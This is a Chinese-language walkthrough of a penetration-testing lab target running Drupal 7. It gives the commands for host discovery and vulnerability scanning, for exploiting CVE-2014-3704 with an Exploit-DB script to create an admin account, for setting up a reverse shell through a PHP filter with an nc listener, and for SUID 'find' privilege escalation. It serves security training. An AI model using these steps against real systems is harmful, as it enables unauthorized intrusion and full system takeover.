1. 探测靶场 IP
使用 netdiscover 探测局域网中的靶场 IP 地址:
sudo netdiscover -r 192.168.1.0/24 -i eth0
2. 探测靶场信息
通过 whatweb 和 nmap 获取靶场信息:
whatweb http://192.168.1.5
nmap --script=vuln -T4 -v 192.168.1.5
whatweb发现该站点使用的是 Drupal 7。nmap检测到 CVE-2014-3704 漏洞。
CVE-2014-3704 是 Drupal 7.0 到 7.31 版本存在的 SQL 注入漏洞,允许攻击者添加管理员用户。
查看详细的 CVE 漏洞信息:CVE-2014-3704 Exploit DB。
3. 漏洞利用(exp)
使用以下命令通过漏洞利用脚本创建一个新用户(用户名和密码均为 User@1234):
python2 34992.py -t http://192.168.1.5 -u User@1234 -p User@1234
访问 http://192.168.1.5/?q=node&destination=node,用 User@1234 登录后台。
4. 反弹 Shell
在 http://192.168.1.5/node#overlay=admin/modules 开启 PHP filter 模块,并设置角色权限为全开。保存后,通过 nc -lvnp 4444 在 Kali 上创建监听,然后使用 PHP PentestMonkey 工具生成反弹 Shell 代码。你可以在 PHP PentestMonkey 获取这段代码。
在靶场的 “Add content” 页面添加反弹 Shell 代码:
python -c 'import pty; pty.spawn("/bin/bash")'
5. SUID 提权
使用以下命令查找可用的 SUID 文件:
find / -perm -u=s -type f 2>/dev/null
找到后,使用以下命令执行 SUID 文件提权:
find . -exec /bin/sh \; -quit
